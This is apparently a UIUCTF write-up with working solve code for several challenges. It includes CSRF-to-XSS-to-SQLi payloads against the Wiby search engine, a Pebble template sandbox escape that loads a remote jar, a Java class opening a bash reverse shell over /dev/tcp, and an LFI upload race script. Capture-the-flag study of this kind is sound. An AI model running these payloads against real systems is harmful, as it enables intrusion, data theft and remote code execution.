This time, TSJ and thehackerscrew jointly participated in UIUCTF and won first place.

web#

woeby#

This challenge is basically a 0day challenge for the Wiby search engine, as the website's URL submission requires admin review, so a headless chromium bot is used to automatically review URLs.

The commit id at the time of the challenge release is 55fb0c3b8415a587c3eae4d897c47b5c2e2ae7eb

When I was solving the challenge, the author had already released a hint saying that this challenge would involve CSRF, XSS, and SQLi, so I checked bot.js:

const { chromium } = require('playwright-chromium');
const { readFile }= require('node:fs/promises');

(async () => {
    console.log('reviewing submissions...')
    const browser = await chromium.launch()
    const context = await browser.newContext()
    context.setDefaultTimeout(2000)
    const page = await context.newPage()
    await page.goto('http://127.0.0.1/review/')

    // cheat to solve captcha... dont worry about it
    const phpsessid = (await context.cookies('http://127.0.0.1'))[0]['value']
    const sessData = await readFile(`/var/lib/php/sessions/sess_${phpsessid}`, 'utf8')
    const captcha = sessData.split('securimage_code_value|a:1:{s:7:"default";s:6:"')[1].substring(0,6)

    // login
    await page.fill('#user', 'admin')
    await page.fill('#pass', process.env.ADMIN_PASSWORD)
    await page.fill('input[name=captcha_code]', captcha)
    await page.click('#login')

    // do review!
    await page.locator('text=awaiting review').waitFor();
    // visit page
    await page.locator('a.tlink').last().click()
    await page.waitForTimeout(5000)
    // finish filling form
    await page.locator('input[name^=crawldepth]').last().fill('1')
    await page.locator('input[name^=crawlpages]').last().fill('5')
    await page.click('#submit')
    await browser.close()
    console.log('Success!')
})()

Basically, it logs in -> clicks your URL -> approves it, and then lets the crawler crawl.

Then, looking at review/review.php, it requires login to access, but not far below, there is this code:

if (isset($_POST['startid']) && $_SESSION["loadreview"]==false)    
{    
	$startID = $_POST['startid'];
	$endID = $_POST['endid'];
}
// ....
if (isset($_POST['startid']) && $_SESSION["loadreview"]==false) //this is incase any new submissions are made during the review process, they will be ignored   
{  
	$result = mysqli_query($link,"SELECT * FROM reviewqueue WHERE id >= $startID AND id <= $endID");
	if(!$result)
	{
	  $error = 'Error fetching index: ' . mysqli_error($link);  
	  include 'error.html.php';  
	  exit(); 
	}
}

It shows an SQLi vulnerability that can be easily triggered using CSRF. Since the admin has just logged in, as long as the CSRF is within the default two minutes of Chromium, it can bypass the default SameSite: Lax setting.

Next, even if SQLi is possible, we still need a way to read the response, and CSRF normally cannot read the response, so XSS is still needed. However, when there is an error, the error message is directly output to the HTML, so using SQL syntax error can achieve XSS.

Therefore, the current process is CSRF -> SQLi (achieve XSS) -> SQLi (get flag), the payload is below:

<!-- <form action="http://localhost:1337/review/review.php" method="POST" id="frm"> -->
<form action="http://127.0.0.1/review/review.php" method="POST" id="frm">
    <textarea name="startid"></textarea>
</form>
<script>
    const xss = `(new Image).src=${JSON.stringify(location.href + '?xss')}
fetch('/review/review.php',{
    method: 'POST',
    body: new URLSearchParams({
        startid: 'extractvalue(1,concat(char(126),(select flag from flag1)))--'
    })
}).then(r=>r.text()).then(t=>{
    const target = ${JSON.stringify(location.href + '?response')}
    fetch(target,{
        method: 'POST',
        body: t,
        mode: 'no-cors'
    })
})
`
    window.name = xss
    frm.startid.value = `<script>eval(name)</`+`script>`
    frm.submit()
</script>
<img src="https://deelay.me/5000/https://picsum.photos/200/300">
uiuctf{cec1e609c

Since the flag for this challenge is divided into two parts, flag1 and flag2, you need to use both the approver and crawler users to SQLi to get the flag. The review.php uses approver, so we need to find another SQLi for crawler.

Searching for other files that use the crawler DB connection, we find insert/insert.php particularly suspicious because it does not use mysqli_real_escape_string but replaces it manually:

//	    $url = mysqli_real_escape_string($link, $_POST['url']);
		$url = str_replace("\'", "\'\'", $_POST['url']);
		$url = str_replace("\"", "\"\"", $url);
//		$title = mysqli_real_escape_string($link, $_POST['title']);
		$title = str_replace("\'", "\'\'", $_POST['title']);
		$title = str_replace("\"", "\"\"", $title);
//		$tags = mysqli_real_escape_string($link, $_POST['tags']);
		$tags = str_replace("\'", "\'\'", $_POST['tags']);
		$tags = str_replace("\"", "\"\"", $tags);
//		$description = mysqli_real_escape_string($link, $_POST['description']);
		$description = str_replace("\'", "\'\'", $_POST['description']);
		$description = str_replace("\"", "\"\"", $description);
//		$body = mysqli_real_escape_string($link, $_POST['body']);
		$body = str_replace("\'", "\'\'", $_POST['body']);
		$body = str_replace("\"", "\"\"", $body);
//		$http = mysqli_real_escape_string($link, $_POST['http']);
		$http = str_replace("\'", "\'\'", $_POST['http']);
		$http = str_replace("\"", "\"\"", $http);
//		$surprise = mysqli_real_escape_string($link, $_POST['surprise']);
		$surprise = str_replace("\'", "\'\'", $_POST['surprise']);
		$surprise = str_replace("\"", "\"\"", $surprise);
//		$worksafe = mysqli_real_escape_string($link, $_POST['worksafe']);
		$worksafe = str_replace("\'", "\'\'", $_POST['worksafe']);
		$worksafe = str_replace("\"", "\"\"", $worksafe);
//    	$enable = mysqli_real_escape_string($link, $_POST['enable']);
		$enable = str_replace("\'", "\'\'", $_POST['enable']);
		$enable = str_replace("\"", "\"\"", $enable);
//		$updatable = mysqli_real_escape_string($link, $_POST['updatable']);
		$updatable = str_replace("\'", "\'\'", $_POST['updatable']);
		$updatable = str_replace("\"", "\"\"", $updatable);

		$sql = 'INSERT INTO windex (url,title,tags,description,body,http,surprise,worksafe,enable,updatable,approver) 
	VALUES ("'.$url.'","'.$title.'","'.$tags.'","'.$description.'","'.$body.'","'.$http.'","'.$surprise.'","'.$worksafe.'","'.$enable.'","'.$updatable.'","'.$_SESSION["user"].'")';


		if (!mysqli_query($link, $sql))   
		{
		  $error = 'Error fetching index: ' . mysqli_error($link);  
		  include 'error.html.php';  
		  exit(); 
		}

There are several errors here. The first is that it uses \' in a " string, so it won't replace ' at all, but since the SQL uses ", this is useless. Also, it doesn't block \, so when controlling multiple inputs, you can use ("\","a",...) to create an SQL injection syntax error...?

Testing this, however, did not yield the expected syntax error. After docker-compose exec into the MySQL inside and doing some tests, I found something strange:

mysql> select "peko\";
+-------+
| peko\ |
+-------+
| peko\ |
+-------+
1 row in set (0.00 sec)

It shows that it directly ignores \, but running MySQL in another Docker container does not do this. This strange situation caused me to be stuck here for a while.

Later, after googling a lot, I found this 5.1.11 Server SQL Modes, which mentions NO_BACKSLASH_ESCAPES that disables MySQL's \ escape. Running SELECT @@GLOBAL.sql_mode; in the challenge's MySQL confirmed it is in this mode.

Checking the Dockerfile, it indeed sets NO_BACKSLASH_ESCAPES, which is required by the Wiby search engine installation settings, so this is normal. However, this means we cannot SQL inject here.

Continuing to search for NO_BACKSLASH_ESCAPES and SQL injection, I found this answer, which essentially says:

With NO_BACKSLASH_ESCAPES enabled, mysql_real_escape_string does not know whether you will use single quotes or double quotes later, and by default, it assumes you will use ', so it only replaces ' with ''. When encountering ", it does nothing!!!

So, looking through other files that use the crawler user login, I found tags/tags.php, which uses mysqli_real_escape_string to escape the URL, but the query concatenation uses double quotes:

$url = mysqli_real_escape_string($link, $_POST['url']);
// ...
$result = mysqli_query($link,'SELECT tags FROM windex WHERE url = "'.$url.'";');

So, injecting double quotes in the URL can directly SQLi. Since this file also requires login to access, we still need to use the previous XSS.

<!-- <form action="http://localhost:1337/review/review.php" method="POST" id="frm"> -->
<form action="http://127.0.0.1/review/review.php" method="POST" id="frm">
	<textarea name="startid"></textarea>
</form>
<script>
	const xss = `(new Image).src=${JSON.stringify(location.href + '?xss')}
    fetch('/tags/tags.php',{
        method: 'POST',
        body: new URLSearchParams({
            url: '" and extractvalue(1,concat(char(126),(select flag from flag2)))-- '
        })
    }).then(r=>r.text()).then(t=>{
        const target = ${JSON.stringify(location.href + '?response')}
        fetch(target,{
            method: 'POST',
            body: t,
            mode: 'no-cors'
        })
    })
    `
	window.name = xss
	frm.startid.value = `<script>eval(name)</` + `script>`
	frm.submit()
</script>
<img src="https://deelay.me/5000/https://picsum.photos/200/300" />
ef0e05add463c52}

spoink#

This challenge is basically a Java LFI, using the Pebble Templates template engine.

First, the challenge has no upload point, so it is likely to use file upload and then LFI temp file. Testing shows that the uploaded file socket file appears in /proc/1/fd/?, but it exists for a very short time. Testing shows that simple brute force spamming can succeed:

while true; do curl 'https://inst-a5ff46b6db9c5682.spoink.chal.uiuc.tf/?x=../../../../../proc/1/fd/16' -F 'a=@payload' -s & ; done

Using Hacktricks SSTI for Pebble directly fails:

{% set cmd = 'id' %}



{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke(null,null)
     .exec(cmd)
     .inputStream
     .readAllBytes() %}
{{ (1).TYPE
     .forName('java.lang.String')
     .constructors[0]
     .newInstance(([bytes]).toArray()) }}

Checking the error, I found BlacklistMethodAccessValidator#isMethodAccessAllowed, which prohibits all method access for objects belonging to Class, so I couldn't think of a way around it.

Stuck here, THS's fredd shared a Room for Escape: Scribbling Outside the Lines of Template Security, which discusses the security of various template engines. It mentioned bypass methods for Pebble's protection but did not provide ready-to-use payloads because The Pebble team is still fixing several bypasses we found for Pebble sandbox. Details will be released on a future date.

However, the article also provided other useful information, such as Pebble exposing Spring Beans. Among them, there is a request object related to ServletRequest. The article used getAttributeNames() to see if there were any interesting objects, and found a method to get the ClassLoader:

{{ request.getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT").classLoader }}

Getting the ClassLoader means we can load any class, but since we can't directly call Class methods, we don't know what to do.

Continuing to read the article, I found a method (not for Pebble):

<#assign urlClassloader=car.class.protectionDomain.classLoader>
<#assign urls=urlClassloader.getURLs()>
<#assign url= URLs[0].toURI().resolve("https://attack.er/pwn.jar").toURL()>
<#assign pwnClassLoader=loader.newInstance(urls+[url])>
<#assign VOID=pwnClassLoader.loadClass("Pwn").getField("PWN").get(null)>

We know we can load remote jars, so I wondered if we could achieve RCE when loadClass. After some attempts, I managed to load my own class, but the code in the static initializer was not executed.

Researching, I found this issue, which explains that Java classes have loaded and initialized states, and static initializers do not execute in the loaded state, so we need to make it initialized.

However, the only ways to initialize a class are newInstance or Class.forName, both of which I couldn't do. So, I went back to the article to see if there was anything else useful.

In the Web Application ClassLoaders section, I found that Tomcat ClassLoader has getResources(), which can be used, and then chaining getContext() and getInstanceManager() to get InstanceManager. It has a newInstance method, so using it to newInstance the remotely loaded class achieves RCE.

{% set cl = request.getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT").classLoader %}
{% set pb = cl.loadClass("java.lang.ProcessBuilder") %}
{% set ar = cl.getURLs() %}
{% set urls = cl.parent.getURLs() %}
{% set im = cl.getResources().getContext().getInstanceManager() %}
{% for url in urls %}
{% set u =
url.toURI().resolve("REMOTE_JAR_URL").toURL() %}
{% set l = [u] %}
{% set ar = l.toArray(ar) %}
{% set jcl = cl.newInstance(ar) %}
{% set c = jcl.loadClass("Pwn") %}
{{ c }}
{{ im.newInstance(c) }}
{% endfor %}

The jar part is simple:

import java.lang.System;
import java.lang.Runtime;

public class Pwn {
    static {
        Process p;
        try {
            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/IP/PORT 0>&1");
            p.waitFor();
            p.destroy();
        } catch (Exception e) {}
    }

    public static void main(String[] args) { }
}
// javac Pwn.java
// jar cf pwn.jar Pwn.class

Later, I asked the author if my brute force upload method was correct, and the author said you could just let the upload hang. Just don't let the multipart form data file end, let it hang, and then send another request to LFI.

from pwn import *

host = "inst-29c2fc660ac14e62.spoink.chal.uiuc.tf"
port = 443

payload = b"""
{% set cl = request.getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT").classLoader %}
{% set pb = cl.loadClass("java.lang.ProcessBuilder") %}
{% set ar = cl.getURLs() %}
{% set urls = cl.parent.getURLs() %}

{% set im = cl.getResources().getContext().getInstanceManager() %}

{% for url in urls %}
{% set u =
url.toURI().resolve("REMOTE_JAR_URL").toURL() %}
{% set l = [u] %}
{% set ar = l.toArray(ar) %}
{% set jcl = cl.newInstance(ar) %}
{% set c = jcl.loadClass("Pwn") %}
{{ c }}
{{ im.newInstance(c) }}
{% endfor %}
"""
payload += b"x" * 1337

body = b"-----------------------------606f6c40cdbf678a\r\n"
body += b'Content-Disposition: form-data; name="lolz"\r\n'
body += b"\r\n"
body += payload

# do not end content disposition
# body += b"-----------------------------606f6c40cdbf678a--\r\n"
# body += b"\r\n"

p = b"POST / HTTP/1.1\r\n"
p += f"Host: {host}\r\n".encode()
p += b"Content-Type: multipart/form-data; boundary=---------------------------606f6c40cdbf678a\r\n"
p += "Content-Length: {}\r\n\r\n".format(len(body) + 1000).encode()
p += body

# io = remote(host, port)
io = remote(host, port, ssl=True)
io.send(p)
for _ in range(1000):
    print(_)
    sleep(0.1)
    io.send(b"a")
io.interactive()

# then run this in another terminal
# curl 'https://inst-29c2fc660ac14e62.spoink.chal.uiuc.tf/?x=../../../../../proc/1/fd/14'
# the number `14` can be changed

Here is another writeup for this challenge for reference: https://blog.arkark.dev/2022/08/01/uiuctf/ (Japanese)

crypto#

asr#

This challenge is an RSA challenge. The challenge provides $e, d$, and $c \equiv m^e \pmod{n}$, but not the public key $n$.

The prime generation part is as follows:

small_primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
def gen_prime(bits, lim = 7, sz = 64):
    while True:
        p = prod([getPrime(sz) for _ in range(bits//sz)])
        for i in range(lim):
            if isPrime(p+1):
                return p+1
            p *= small_primes[i]

p = gen_prime(512)
q = gen_prime(512)

From this, we know that $p-1, q-1$ are both $2^{64}$ smooth, and $ed-1$ is a multiple of $(p-1)(q-1)$, so using ECM to factorize it will work.

After factorizing $ed-1$, we know it has exactly 16 64-bit primes, so we brute force $\binom{16}{8}$ combinations, and then multiply back those small primes, add one, and if it is a prime, it could be $p$ or $q$.

Since the flag length should not be long, getting one $p$ or $q$ is enough.

from itertools import combinations
from Crypto.Util.number import isPrime, long_to_bytes

e = 65537
d = 195285722677343056731308789302965842898515630705905989253864700147610471486140197351850817673117692460241696816114531352324651403853171392804745693538688912545296861525940847905313261324431856121426611991563634798757309882637947424059539232910352573618475579466190912888605860293465441434324139634261315613929473
ct = 212118183964533878687650903337696329626088379125296944148034924018434446792800531043981892206180946802424273758169180391641372690881250694674772100520951338387690486150086059888545223362117314871848416041394861399201900469160864641377209190150270559789319354306267000948644929585048244599181272990506465820030285

kphi = e*d-1
print(kphi)
# ecm.factor(kphi)
fact = [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 5, 5, 5, 7, 7, 11, 10357495682248249393, 10441209995968076929, 10476183267045952117, 11157595634841645959, 11865228112172030291, 12775011866496218557, 13403263815706423849, 13923226921736843531, 14497899396819662177, 14695627525823270231, 15789155524315171763, 16070004423296465647, 16303174734043925501, 16755840154173074063, 17757525673663327889, 18318015934220252801]
big = [f for f in fact if f > 100]
small = sorted(list(set([f for f in fact if f < 100])))

small_primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
for ps in combinations(big, 8):
    p = product(ps)
    for i in range(len(small)):
        p *= small_primes[i]
        if isPrime(p+1):
            print('pr', p+1)
            print(long_to_bytes(power_mod(ct, d, p+1)))
# uiuctf{bru4e_f0rc3_1s_FUn_fuN_Fun_f0r_The_whOLe_F4miLY!}

*Wringing Rings#

Didn't solve during the competition, recording the different methods I used

This challenge has a ninth-degree polynomial $f(x)$ over $\mathbf{Z}$, and you are given nine SSS shares. The goal is to get $f(0)$. The coefficients $a_i$ of the polynomial are in the range $[1,500000]$.

One direct method is to brute force the tenth share, then try interpolation to see if it fits the range. Alternatively, you can set up a matrix to get a solution, then add the kernel and brute force a bit, both methods are similar.

My approach was to set up the matrix and use LLL to get the solution, as the coefficient range is not large, so it is expected to be the shortest vector, and it worked:

from pwn import *
from sage.all import *
import ast

# io = process(["python", "server.py"])
io = remote("ring.chal.uiuc.tf", 1337)
io.recvuntil(b'polynomial: \n')
xs = []
ys = []
for _ in range(9):
    x, y = ast.literal_eval(io.recvlineS().strip())
    xs.append(x)
    ys.append(y)

print(xs)
print(ys)
M = matrix([[x**i for i in range(9 + 1)] for x in xs])
M = M.T.stack(vector(ys))
M = M.augment(matrix.identity(11))
M[:,:9] *= 2 ** 32
sol = -M.LLL()[0][9:-1]
io.sendline(str(sol[0]).encode())
io.interactive()
# uiuctf{turn5_0ut_th4t_th3_1nt3g3r5_4l50_5uck}

Also, in the cryptohack discord, I saw someone using CRT, but I didn't quite understand that method.

jail#

Firefox Shell 1#

This challenge is a jail escape on Firefox's SpiderMonkey. The author not only ported node.js's REPL to it but also added a .debug command to give us access to the Debugger API.

The difference between this challenge and the second one is that it does not set a hardened option, which affects this part of repl.js:

case '.debug':
  const target = this.getTarget();
  const debuggerSandboxUnpriv = Cu.waiveXrays(
    Cu.Sandbox(target, {
      freshCompartment: true,
      wantXrays: false,
    })
  );
  addDebuggerToGlobal(debuggerSandboxUnpriv);

  const principal = Cu.getObjectPrincipal(this.getTarget());
  if (!principal.isSystemPrincipal && Configuration.hardened) {
    delete debuggerSandboxUnpriv.Debugger.prototype.addAllGlobalsAsDebuggees;
    delete debuggerSandboxUnpriv.Debugger.prototype.findAllGlobals;
    delete debuggerSandboxUnpriv.Debugger.prototype.onNewGlobalObject;
  }

  Cu.waiveXrays(target).Debugger = debuggerSandboxUnpriv.Debugger;
  return true;

It shows that three additional functions are removed, so the key is obviously related to these three functions. Reading the Debugger Object, we know that these three APIs are related to privileged code.

.debug
dbg=new Debugger()
dbg.addAllGlobalsAsDebuggees()
a=dbg.getDebuggees()

Testing the above code shows that a contains many objects. Comparing their prototypes, we know they are Debugger.Object objects, which are like a proxy layer for objects in the debuggee, allowing us to manipulate many things.

Running a.map(x=>x.getOwnPropertyNames()) reveals many interesting things, including some objects with Cu and similar things, which look like privileged APIs, but we don't know how to use them.

First, we can use x.getProperty(...).return to get other proxy objects, but there is a better executeInGlobal that allows us to eval in that context.

Googling, we find How to read a local file in an add-on for Firefox version 45+, which provides a simple example of using Cu and similar objects. Combining this, we can extract the flag.

.debug
dbg=new Debugger();
dbg.addAllGlobalsAsDebuggees()
a=dbg.getDebuggees()
for(const x of a){
    if(x.getOwnPropertyNames().includes('Cu')){
        globalThis.p=x.executeInGlobal(`
Cu.import("resource://gre/modules/osfile.jsm", {}).OS.File.read("/flag")
        `).return
        break
    }
}
u8=globalThis.p.promiseValue
ar=[]
for(let i=0;i<u8.getProperty('length').return;i++){
    ar.push(u8.getProperty(i).return)
}
ar.map(x=>String.fromCharCode(x)).join('')
// uiuctf{why_mozilla_why_docs_either_deleted_or_bad_3466658a}

Later, the author added that after privilege escalation, there is no SOP, so directly fetch("file:///flag") is enough. If the global context lacks fetch, use Cu.importGlobalProperties(['fetch']).